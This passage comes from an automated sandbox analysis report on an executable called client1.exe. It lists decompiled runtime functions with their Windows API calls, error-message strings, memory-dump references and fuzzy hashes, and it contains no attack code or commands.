                                                    • Opcode Fuzzy Hash: 01a0bb9e98a22bc39d92f1d9306349b6b95e7735addeeef39cbdf51254e5f23a
                                                    • Instruction Fuzzy Hash: D3316B32A08BC289EB20FF71E8451E9A36AFF88794F800135EA5D8BA55DF7CD145C711
                                                    Function 00007FF79F622620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F6274B0: GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                      • Part of subcall function 00007FF79F6274B0: FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MessageBoxA.USER32 ref: 00007FF79F622748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 2806210788-2410924014
                                                    • Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                    • Instruction ID: 427f49a35eef2caea9a4960fb05762d764c75c52f36becf58bf441f8cbd09b05
                                                    • Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                    • Instruction Fuzzy Hash: 8631747262C7C291E630BB20E8517DAA36AFB84794FC04036E69D43A99DF3CD305CB50
                                                    Function 00007FF79F6388E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                    • Instruction ID: 46445f8685af585de1a2bd3e6bf8cc80228188c3258e4f9d9d5d6f64c18f88db
                                                    • Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                    • Instruction Fuzzy Hash: 10F0AF71A0978291EA30BB34A8843B9932AAF897B5FC40235C57D466E4CF6CD448C320
                                                    Function 00007FF79F6487A4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction ID: 994d73378fc6788d0adf3b655954d8948b8ff5b4b35ccd91aa673180338e089c
                                                    • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                    • Instruction Fuzzy Hash: 3811CE32E58B8705F6B43138E4523F9944B6F593F4F880230EA7E06AE6DF2CAC614275
                                                    Function 00007FF79F63A860 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A87F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A89E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8C6
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8D7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F639A73,?,?,00000000,00007FF79F639D0E,?,?,?,?,?,00007FF79F6321EC), ref: 00007FF79F63A8E8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                    • Instruction ID: 87755686d646a12ca7cb0f6417ada6b8332a2dd90d1f76302ff083e3e3c9446f
                                                    • Opcode Fuzzy Hash: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                    • Instruction Fuzzy Hash: 27114C24E1C3C241FA78B335AA411FAE24B5F557B0F844334E87E566D6DEADB4429630
                                                    Function 00007FF79F63A6F4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A705
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A724
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A74C
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A75D
                                                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF79F642433,?,?,?,00007FF79F63CB8C,?,?,00000000,00007FF79F633A5F), ref: 00007FF79F63A76E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                    • Instruction ID: 9076ae7c84df3867ed5b9104e1184d68ed80a24e79805a6537f48b8d8785659b
                                                    • Opcode Fuzzy Hash: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                    • Instruction Fuzzy Hash: 51112A28E0C38301F978BB7148921FA92AB4F56770F840734D83E4A6D2DDADB441A631
                                                    Function 00007FF79F63F198 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                    • API String ID: 3215553584-1196891531
                                                    • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction ID: 1542419fdd7386e72493200d0f49359441f601781debbe21f9e69f7a4f0e499c
                                                    • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                    • Instruction Fuzzy Hash: EC81C731D2C38285F7787E3D89402F8B69AAF11B48FD58035DA2D9B286CFBDE4059361
                                                    Function 00007FF79F62E108 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction ID: a7dcd6674dd98766165323c66a314b684f0f5cf4b64d6333bf91d0467ab5d1a8
                                                    • Opcode Fuzzy Hash: e66b2a899b3be21a272ca3efbe1e1fab7eec351de36f73ff2a6cc06a45c4f2b1
                                                    • Instruction Fuzzy Hash: 90617C32A08B858AE720AF75D8803EDB7A5FB54B88F544235EE9D57B98CF38E045C711
                                                    Function 00007FF79F62E464 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction ID: 89e6ea3a9b9764ae6a7bd996ea31cba2f5743fa1988ae6ff5b57a3f20f2b1cbe
                                                    • Opcode Fuzzy Hash: 37bca86698e542f9df3f1c5971c843800452ce466371b2576d682bdca002ed1e
                                                    • Instruction Fuzzy Hash: 1151B3329087C286DB74AF2199402E8B7AAFB64B94F944135DAAC87BD5CF3CE450C712
                                                    Function 00007FF79F6224D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 1878133881-2410924014
                                                    • Opcode ID: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction ID: 5e41e6416dcbca17ebcc084aa2b1602857236b40ea0d1787d6511593137c4f44
                                                    • Opcode Fuzzy Hash: 1ad8658de8dbd2e7b08889bff9c9537d6e44ae678795f4b96bc9f189f6c45e5f
                                                    • Instruction Fuzzy Hash: C83174726287C191EA30BB20E4517DAA36AFB84784FC04035EA9D47A89DF3CD305CB50
                                                    Function 00007FF79F623BA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,00007FF79F623699), ref: 00007FF79F623BD1
                                                      • Part of subcall function 00007FF79F622620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F622620: MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastMessageModuleName
                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                    • API String ID: 2581892565-1977442011
                                                    • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                    • Instruction ID: 64e40b5f08e71e9dbc1b1938ebb9efc0a48c75c8d0abd793f5d21a7513db45bc
                                                    • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                    • Instruction Fuzzy Hash: 0701BC21B1C3C290FA30BB30EC523F9925BBF08394FC00535E86EC6682EE5CE1459621
                                                    Function 00007FF79F63BA70 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                    • Instruction ID: f573e26b156dbeec8fe4ddbf6412b31814c1fa5a6ee9b81dedc133e0dd9b5fc8
                                                    • Opcode Fuzzy Hash: f750311aff661a04a86bbbada4284786bf27b8065a17484a8f486471230e888d
                                                    • Instruction Fuzzy Hash: 7ED1E022B18B8189E720DF79D4402EC77BAFB847D8B804225DE6E97B99DE78D416C310
                                                    Function 00007FF79F621F70 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$DialogInvalidateRect
                                                    • String ID:
                                                    • API String ID: 1956198572-0
                                                    • Opcode ID: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction ID: d3e74ef10bdee7ac3501ca7d7d83abf59f251e85485275c8c19478c86165f97c
                                                    • Opcode Fuzzy Hash: 162ef6909b0da24e61350fefbcaa0130b5f771c4d53ef42d88aea1c24daf7f6c
                                                    • Instruction Fuzzy Hash: 5711EC21E1C3C241FA71BB79E9442F99297EF89790FC44030E96947B8DDE2CD5C14111
                                                    Function 00007FF79F644D3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                    • String ID: ?
                                                    • API String ID: 1286766494-1684325040
                                                    • Opcode ID: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                    • Instruction ID: 3225b170cf9919eee0b2f84586cb995d08a99e14da07d48812648177800a96ba
                                                    • Opcode Fuzzy Hash: c6b54485bead06bc5539c244e4ab75d05ddcaebff17989ae90453d9827129cd1
                                                    • Instruction Fuzzy Hash: 4D41D613A087C255FB74BB3594023FAA6AAEF81BA4FA44235EF6C07AD5DE3CD4518710
                                                    Function 00007FF79F637E6C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F637E9E
                                                      • Part of subcall function 00007FF79F639E18: RtlFreeHeap.NTDLL(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E2E
                                                      • Part of subcall function 00007FF79F639E18: GetLastError.KERNEL32(?,?,?,00007FF79F641E42,?,?,?,00007FF79F641E7F,?,?,00000000,00007FF79F642345,?,?,?,00007FF79F642277), ref: 00007FF79F639E38
                                                    • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF79F62B105), ref: 00007FF79F637EBC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\Desktop\client1.exe
                                                    • API String ID: 3580290477-3981961939
                                                    • Opcode ID: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                    • Instruction ID: c7243760c77a5a2ba2524ef3bb143f7c618380d230a22ee2f67c0ac2cee44451
                                                    • Opcode Fuzzy Hash: 3943842da798c31a181edbdfd7e827be925f8530d91395b67a93139410b16115
                                                    • Instruction Fuzzy Hash: 27415F32A08B9285EB24FF35D4800F8A7AAFF45794BD44039E96E43B85EF7DE4418760
                                                    Function 00007FF79F63C108 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: U
                                                    • API String ID: 442123175-4171548499
                                                    • Opcode ID: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction ID: d8288a821d60d807d24e101a889977289f27ecd64d153d6bd9ca5533d84db7b9
                                                    • Opcode Fuzzy Hash: 4134df34369bde334de186fcdf44a7df93ab1702ff4cc21259579c47d67cfea1
                                                    • Instruction Fuzzy Hash: 6941BF22A18B8186EB30AF65E8443E9B7AAFB88794F804131EE5D87798DF7CD441C750
                                                    Function 00007FF79F63E508 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2690165915.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000000.00000002.2690142612.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690205145.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690243481.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2690289045.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: c96ce3ad044416fb9599911189556e1cf2cbbd82c862d3c5499b8d6e200c136e
